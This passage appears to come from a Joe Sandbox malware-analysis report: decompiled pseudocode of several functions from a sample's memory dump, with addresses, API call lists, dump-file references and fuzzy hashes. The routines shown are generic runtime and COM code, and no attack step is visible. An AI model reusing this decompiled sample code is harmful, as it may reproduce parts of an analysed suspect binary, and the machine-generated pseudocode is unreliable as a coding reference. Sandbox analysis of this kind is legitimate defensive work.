							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E00402521( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E00413F60(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E0041EC90(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E00403A5E( &_v20);
										E00411B78(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E0040254C(0, __edx, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E0040254C(0, __edx, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E00413F60(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}



























                                                                                                                            0x00414806
                                                                                                                            0x0041480e
                                                                                                                            0x00414810
                                                                                                                            0x00414815
                                                                                                                            0x00414828
                                                                                                                            0x0041482c
                                                                                                                            0x00414869
                                                                                                                            0x00414869
                                                                                                                            0x0041486b
                                                                                                                            0x0041486e
                                                                                                                            0x00414871
                                                                                                                            0x0041488a
                                                                                                                            0x0041488a
                                                                                                                            0x0041488d
                                                                                                                            0x0041488f
                                                                                                                            0x00414895
                                                                                                                            0x00414896
                                                                                                                            0x0041489d
                                                                                                                            0x004148a6
                                                                                                                            0x004148a6
                                                                                                                            0x004148a9
                                                                                                                            0x004148ac
                                                                                                                            0x004148af
                                                                                                                            0x004148b2
                                                                                                                            0x0041495c
                                                                                                                            0x0041495c
                                                                                                                            0x0041495f
                                                                                                                            0x00414970
                                                                                                                            0x00414973
                                                                                                                            0x00414976
                                                                                                                            0x00414978
                                                                                                                            0x0041497e
                                                                                                                            0x00414986
                                                                                                                            0x0041498f
                                                                                                                            0x0041498f
                                                                                                                            0x00414992
                                                                                                                            0x00414995
                                                                                                                            0x004149bc
                                                                                                                            0x004149be
                                                                                                                            0x00000000
                                                                                                                            0x00414997
                                                                                                                            0x00414997
                                                                                                                            0x00414997
                                                                                                                            0x00414999
                                                                                                                            0x004149a3
                                                                                                                            0x004149ab
                                                                                                                            0x004149b0
                                                                                                                            0x004149b3
                                                                                                                            0x004149b4
                                                                                                                            0x004149b7
                                                                                                                            0x004149b7
                                                                                                                            0x00000000
                                                                                                                            0x00414999
                                                                                                                            0x004148b8
                                                                                                                            0x004148b8
                                                                                                                            0x004148bb
                                                                                                                            0x004148c5
                                                                                                                            0x004148c8
                                                                                                                            0x004148ca
                                                                                                                            0x004148cd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004148d2
                                                                                                                            0x004148d2
                                                                                                                            0x004148d5
                                                                                                                            0x004148e3
                                                                                                                            0x004148f9
                                                                                                                            0x00414907
                                                                                                                            0x0041490e
                                                                                                                            0x00414916
                                                                                                                            0x0041491e
                                                                                                                            0x00414926
                                                                                                                            0x00414929
                                                                                                                            0x0041493a
                                                                                                                            0x0041493e
                                                                                                                            0x00414941
                                                                                                                            0x00414941
                                                                                                                            0x00414947
                                                                                                                            0x00414947
                                                                                                                            0x00414949
                                                                                                                            0x00414949
                                                                                                                            0x0041494f
                                                                                                                            0x00414953
                                                                                                                            0x00414953
                                                                                                                            0x00000000
                                                                                                                            0x004148bb
                                                                                                                            0x004148b2
                                                                                                                            0x00414876
                                                                                                                            0x00414876
                                                                                                                            0x00414879
                                                                                                                            0x00414879
                                                                                                                            0x0041487b
                                                                                                                            0x0041487e
                                                                                                                            0x00414881
                                                                                                                            0x00414882
                                                                                                                            0x00414885
                                                                                                                            0x00414885
                                                                                                                            0x00000000
                                                                                                                            0x00414879
                                                                                                                            0x0041482e
                                                                                                                            0x00414830
                                                                                                                            0x00414833
                                                                                                                            0x00414866
                                                                                                                            0x00414866
                                                                                                                            0x00000000
                                                                                                                            0x00414866
                                                                                                                            0x00414835
                                                                                                                            0x00414838
                                                                                                                            0x0041483f
                                                                                                                            0x00414845
                                                                                                                            0x00414849
                                                                                                                            0x0041484a
                                                                                                                            0x0041484a
                                                                                                                            0x0041484f
                                                                                                                            0x00414852
                                                                                                                            0x00414854
                                                                                                                            0x00414857
                                                                                                                            0x0041485c
                                                                                                                            0x0041485f
                                                                                                                            0x00414865
                                                                                                                            0x00000000
                                                                                                                            0x00414852
                                                                                                                            0x00414817
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 1473721057-3887548279
                                                                                                                            • Opcode ID: 2ad30d727584a7d3cec67fe14fe3abec26e291c6ec7bf716b8c0870fa52e3011
                                                                                                                            • Instruction ID: d5cff0d6f923fafde5a242ac59ced0942c0de1f9463a600e4d9db36625c785dd
                                                                                                                            • Opcode Fuzzy Hash: 2ad30d727584a7d3cec67fe14fe3abec26e291c6ec7bf716b8c0870fa52e3011
                                                                                                                            • Instruction Fuzzy Hash: 41517971A00B01DFC764DF69C9819AAB7F0FF88314B504A6EE58687A91C774F981CB48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041251D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E0041251D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t78;
				signed int _t86;
				intOrPtr _t92;
				intOrPtr* _t109;
				intOrPtr* _t111;
				intOrPtr* _t113;
				signed int _t115;
				signed int _t123;
				signed int _t126;
				intOrPtr* _t148;
				void* _t150;

				_push(0x70);
				E0041E981(E00431A27, __ebx, __edi, __esi);
				_t150 = __ecx;
				_t78 =  *(__ecx + 0x50);
				_t123 = 0;
				_t126 = 0 | _t78 != 0x00000000;
				if(_t126 != 0) {
					_push( &_v16);
					_push(0x437bdc);
					_v16 = 0;
					_t126 =  *_t78;
					_push(_t78);
					_v20 = 0;
					if( *_t126() < 0) {
						L18:
						return E0041EA59(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L3;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E0041A21A( &_v36);
							_t92 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t92 == 0) {
								goto L3;
							} else {
								_t148 =  *((intOrPtr*)(_t92 + 0x20));
								_v104 = 0;
								if(_t148 == 0) {
									goto L3;
								} else {
									do {
										_t30 = _t123 + 0x4350b8; // 0xfffffd3b
										 *((intOrPtr*)( *_t148 + 0x104))(_t150,  *_t30,  &_v36);
										if(_v28 != 0) {
											_t33 = _t123 + 0x4350bc; // 0x4
											_v104 = _v104 |  *_t33;
										}
										_t123 = _t123 + 8;
									} while (_t123 < 0x40);
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t148 + 0x104))(_t150, 0xfffffd41,  &_v36);
									_t109 = _v28;
									_push( &_v92);
									_push(0x437c2c);
									_push(_t109);
									if( *((intOrPtr*)( *_t109))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t111 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t111);
									if( *((intOrPtr*)( *_t111 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t150 + 0x70)) = _v56;
										 *((intOrPtr*)(_t150 + 0x60)) = _v48;
										 *((intOrPtr*)(_t150 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t113 = _v16;
									 *((intOrPtr*)( *_t113 + 8))(_t113);
									_t115 = _v92;
									if(_t115 != 0) {
										 *((intOrPtr*)( *_t115 + 8))(_t115);
									}
									__imp__#9( &_v36);
									goto L18;
								}
							}
						}
					}
				} else {
					L3:
					_push(_t126);
					_v24 = 0x4408f8;
					E00420866( &_v24, 0x43b8fc);
					asm("int3");
					_t86 = _t126;
					 *((intOrPtr*)(_t86 + 4)) = 1;
					return _t86;
				}
			}






































                                                                                                                            0x0041251d
                                                                                                                            0x00412524
                                                                                                                            0x00412529
                                                                                                                            0x0041252b
                                                                                                                            0x00412530
                                                                                                                            0x00412534
                                                                                                                            0x00412539
                                                                                                                            0x00412543
                                                                                                                            0x00412544
                                                                                                                            0x00412549
                                                                                                                            0x0041254c
                                                                                                                            0x0041254e
                                                                                                                            0x0041254f
                                                                                                                            0x00412556
                                                                                                                            0x004126cb
                                                                                                                            0x004126d3
                                                                                                                            0x0041255c
                                                                                                                            0x00412566
                                                                                                                            0x00000000
                                                                                                                            0x00412568
                                                                                                                            0x0041256e
                                                                                                                            0x00412577
                                                                                                                            0x00412580
                                                                                                                            0x00412587
                                                                                                                            0x0041258e
                                                                                                                            0x00412591
                                                                                                                            0x00412594
                                                                                                                            0x00412597
                                                                                                                            0x0041259a
                                                                                                                            0x0041259f
                                                                                                                            0x004125a4
                                                                                                                            0x004125a7
                                                                                                                            0x00000000
                                                                                                                            0x004125a9
                                                                                                                            0x004125a9
                                                                                                                            0x004125ae
                                                                                                                            0x004125b1
                                                                                                                            0x00000000
                                                                                                                            0x004125b3
                                                                                                                            0x004125b3
                                                                                                                            0x004125b9
                                                                                                                            0x004125c2
                                                                                                                            0x004125cd
                                                                                                                            0x004125cf
                                                                                                                            0x004125d5
                                                                                                                            0x004125d5
                                                                                                                            0x004125d8
                                                                                                                            0x004125db
                                                                                                                            0x004125ee
                                                                                                                            0x00412600
                                                                                                                            0x00412608
                                                                                                                            0x0041261a
                                                                                                                            0x00412622
                                                                                                                            0x00412635
                                                                                                                            0x0041263d
                                                                                                                            0x0041264f
                                                                                                                            0x00412657
                                                                                                                            0x0041265d
                                                                                                                            0x00412665
                                                                                                                            0x00412666
                                                                                                                            0x0041266b
                                                                                                                            0x00412670
                                                                                                                            0x00412672
                                                                                                                            0x00412672
                                                                                                                            0x00412676
                                                                                                                            0x0041267c
                                                                                                                            0x00412680
                                                                                                                            0x00412681
                                                                                                                            0x0041268a
                                                                                                                            0x00412690
                                                                                                                            0x00412695
                                                                                                                            0x0041269b
                                                                                                                            0x004126a1
                                                                                                                            0x004126a4
                                                                                                                            0x004126a4
                                                                                                                            0x004126ab
                                                                                                                            0x004126b1
                                                                                                                            0x004126b4
                                                                                                                            0x004126b9
                                                                                                                            0x004126be
                                                                                                                            0x004126be
                                                                                                                            0x004126c5
                                                                                                                            0x00000000
                                                                                                                            0x004126c5
                                                                                                                            0x004125b1
                                                                                                                            0x004125a7
                                                                                                                            0x00412566
                                                                                                                            0x0041253b
                                                                                                                            0x0041253b
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog3
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 431132790-2766056989
                                                                                                                            • Opcode ID: 8dfec864eb6e3336f129d95db0d87d2145d14c1474b617c0c666504869cb95de
                                                                                                                            • Instruction ID: 2c89396389e43c2dafcb1c26eaf2be21cd51329855ab6d916e9cf085edcc8dff
                                                                                                                            • Opcode Fuzzy Hash: 8dfec864eb6e3336f129d95db0d87d2145d14c1474b617c0c666504869cb95de
                                                                                                                            • Instruction Fuzzy Hash: 6451E7B1A002099FDB04DFA5C9C8AEEB7F9BF48304F14456EE416EB290E775A945CF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403345 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E00403345(intOrPtr __ebx, void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t33;
				signed int _t36;

				_t21 = __ebx;
				_t11 =  *0x441590; // 0x4917eadc
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E00402BAF( &_v280, _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E0040305E(__ebx,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E0041D773(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}
















                                                                                                                            0x00403345
                                                                                                                            0x0040334e
                                                                                                                            0x00403355
                                                                                                                            0x0040335b
                                                                                                                            0x0040336b
                                                                                                                            0x00403373
                                                                                                                            0x004033ca
                                                                                                                            0x004033ca
                                                                                                                            0x004033ca
                                                                                                                            0x00403379
                                                                                                                            0x00403381
                                                                                                                            0x00403387
                                                                                                                            0x0040338f
                                                                                                                            0x00403390
                                                                                                                            0x00403394
                                                                                                                            0x0040339f
                                                                                                                            0x004033a5
                                                                                                                            0x004033a6
                                                                                                                            0x004033a7
                                                                                                                            0x00000000
                                                                                                                            0x004033a9
                                                                                                                            0x004033b4
                                                                                                                            0x004033c3
                                                                                                                            0x004033c3
                                                                                                                            0x004033a7
                                                                                                                            0x004033d8

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0040336B
                                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 00403381
                                                                                                                              • Part of subcall function 00402BAF: _strcpy_s.LIBCMT ref: 00402BBB
                                                                                                                              • Part of subcall function 0040305E: __EH_prolog3.LIBCMT ref: 0040307D
                                                                                                                              • Part of subcall function 0040305E: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 0040309E
                                                                                                                              • Part of subcall function 0040305E: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 004030AF
                                                                                                                              • Part of subcall function 0040305E: ConvertDefaultLocale.KERNELBASE(?), ref: 004030E5
                                                                                                                              • Part of subcall function 0040305E: ConvertDefaultLocale.KERNELBASE(?), ref: 004030ED
                                                                                                                              • Part of subcall function 0040305E: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00403101
                                                                                                                              • Part of subcall function 0040305E: ConvertDefaultLocale.KERNEL32(?), ref: 00403125
                                                                                                                              • Part of subcall function 0040305E: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040312B
                                                                                                                              • Part of subcall function 0040305E: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00403164
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                            • String ID: %s.dll
                                                                                                                            • API String ID: 3444012488-3668843792
                                                                                                                            • Opcode ID: c0624e443c4e1e16005d0011fe7891e801f5276c8f740c497bc84bf1f9a6d7c1
                                                                                                                            • Instruction ID: 0c2c2c68e6a4fa814e4f5269dbff2fe9bc4f433f1251dc6102a17ed9abd2e0e0
                                                                                                                            • Opcode Fuzzy Hash: c0624e443c4e1e16005d0011fe7891e801f5276c8f740c497bc84bf1f9a6d7c1
                                                                                                                            • Instruction Fuzzy Hash: A40196B2A1011CABCB18EF64DD569EE77BCEB04B01F0005BAA906E3180EA789B048755
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00430936 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 56%
                                                                                                                            			E00430936() {
				signed int _t7;
				long _t11;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				signed int _t21;
				signed int _t23;

				_t21 = _t23;
				_t7 =  *0x441590; // 0x4917eadc
				 *(_t21 - 4) = _t7 ^ _t21;
				 *(_t21 - 0x98) = 0x94;
				GetVersionExA(_t21 - 0x98);
				if( *((intOrPtr*)(_t21 - 0x88)) != 2) {
					L2:
					_t11 = E004308CC;
				} else {
					_t11 = E00430931;
					if( *((intOrPtr*)(_t21 - 0x94)) < 5) {
						goto L2;
					}
				}
				InterlockedExchange("5	C", _t11);
				return E0041D773( *0x4427d8(), _t15,  *(_t21 - 4) ^ _t21, _t18, _t19, _t20);
			}











                                                                                                                            0x00430936
                                                                                                                            0x0043093e
                                                                                                                            0x00430945
                                                                                                                            0x0043094f
                                                                                                                            0x00430959
                                                                                                                            0x00430966
                                                                                                                            0x00430976
                                                                                                                            0x00430976
                                                                                                                            0x00430968
                                                                                                                            0x0043096f
                                                                                                                            0x00430974
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00430974
                                                                                                                            0x00430981
                                                                                                                            0x00430998

                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(?), ref: 00430959
                                                                                                                            • InterlockedExchange.KERNEL32(5C,Function_000308CC), ref: 00430981
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExchangeInterlockedVersion
                                                                                                                            • String ID: 5C
                                                                                                                            • API String ID: 2700998522-3824571658
                                                                                                                            • Opcode ID: 730d427cf434679a2e3d80f3f42988c7989b58a3581fc64e8dcc698a0e59dc9a
                                                                                                                            • Instruction ID: ab5fb36a610f5d725879c1cf411eedb187e9f029e04dc2369bce9f30caabfa5f
                                                                                                                            • Opcode Fuzzy Hash: 730d427cf434679a2e3d80f3f42988c7989b58a3581fc64e8dcc698a0e59dc9a
                                                                                                                            • Instruction Fuzzy Hash: 8EF037709001049FDB50EF64D95A79E77B4EF09305F5055F6E40AD1252CB784EC9CF49
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A09A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0040A09A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v16;
				unsigned int _t10;
				unsigned int _t11;
				void* _t22;

				_push(__esi);
				_push(E00405A19);
				_t22 = E0040E7CC(__ebx, 0x442940, __edi, __esi, __eflags);
				if(_t22 != 0) {
					 *((intOrPtr*)(_t22 + 0x68)) = GetMessageTime();
					_t10 = GetMessagePos();
					_t11 = _t10 >> 0x10;
					__eflags = _t11;
					 *((intOrPtr*)(_t22 + 0x70)) = _t11;
					 *((intOrPtr*)(_t22 + 0x6c)) = _t10;
					_t4 = _t22 + 0x58; // 0x58
					return _t4;
				} else {
					_push(0x442940);
					_v16 = 0x4408f8;
					E00420866( &_v16, 0x43b8fc);
					asm("int3");
					 *0x00442944 = 1;
					return 0x442940;
				}
			}







                                                                                                                            0x0040a09a
                                                                                                                            0x0040a09b
                                                                                                                            0x0040a0aa
                                                                                                                            0x0040a0ae
                                                                                                                            0x0040a0bb
                                                                                                                            0x0040a0be
                                                                                                                            0x0040a0c7
                                                                                                                            0x0040a0c7
                                                                                                                            0x0040a0cd
                                                                                                                            0x0040a0d0
                                                                                                                            0x0040a0d3
                                                                                                                            0x0040a0d7
                                                                                                                            0x0040a0b0
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040E7CC: __EH_prolog3.LIBCMT ref: 0040E7D3
                                                                                                                            • GetMessageTime.USER32(Function_00005A19), ref: 0040A0B5
                                                                                                                            • GetMessagePos.USER32 ref: 0040A0BE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$H_prolog3Time
                                                                                                                            • String ID: @)D
                                                                                                                            • API String ID: 3041656633-3123465904
                                                                                                                            • Opcode ID: b7d5b7d08b44ab23c5809746a57f6232de7fae44f4b93acdf8cecc9a7f12825e
                                                                                                                            • Instruction ID: 9bfd383f392498773de437ea21f982aa66e3bbd2346c0387464a6bbaa007322f
                                                                                                                            • Opcode Fuzzy Hash: b7d5b7d08b44ab23c5809746a57f6232de7fae44f4b93acdf8cecc9a7f12825e
                                                                                                                            • Instruction Fuzzy Hash: 97E08631800F208FD3219F6664485A7B6D0DB00322300893FD8C3D7750DB38D405CF49
